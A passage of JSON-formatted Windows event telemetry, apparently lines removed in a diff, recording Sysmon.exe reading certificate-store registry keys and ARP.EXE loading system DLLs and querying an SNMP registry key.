"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ARP.EXE", - "image_path": "C:\\Windows\\System32\\ARP.EXE", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "snmpapi.dll", - "image_path": "C:\\Windows\\System32\\snmpapi.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters\\TrapPollTimeMilliSecs", - "registry_value": "TrapPollTimeMilliSecs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc6.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 